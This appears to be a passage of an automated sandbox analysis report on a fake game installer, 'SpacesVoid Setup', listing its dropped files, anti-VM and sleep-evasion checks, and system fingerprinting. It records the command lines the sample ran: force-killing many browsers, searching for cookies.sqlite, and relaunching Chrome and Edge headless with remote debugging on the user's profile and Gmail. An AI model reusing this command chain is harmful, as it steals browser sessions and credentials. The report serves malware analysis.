Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats\prebuilds\win32-x64\node.napi.node	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212	Thread sleep count: 2405 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212	Thread sleep count: 3633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809			Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats\dist	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\locales	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked	Jump to behavior

Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (!isMesa && IsMaliT8xxOrOlder(functions)) \|\| (!isMesa && IsMaliG31OrOlder(functions))
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558300256.0000000004E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:6
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558300256.0000000004E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@HX2
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2570972541.00000000055C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558300256.0000000004E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ngineer
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2437718962.00000000051D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgab
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2571486713.0000000004C81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2570972541.00000000055C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e; usually it is an empty result.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2570972541.00000000055C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lse
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558300256.0000000004E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2596005530.0000000004C80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#Cd
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558300256.0000000004E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007574000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2437718962.00000000051D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Screen Codec / VMware Video

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Excessive usage of taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv \| "C:\Windows\system32\find.exe" "SpacesVoid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "SpacesVoid.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list \| find /i "Speed""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . *.sqlite"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . cookies.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . *.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
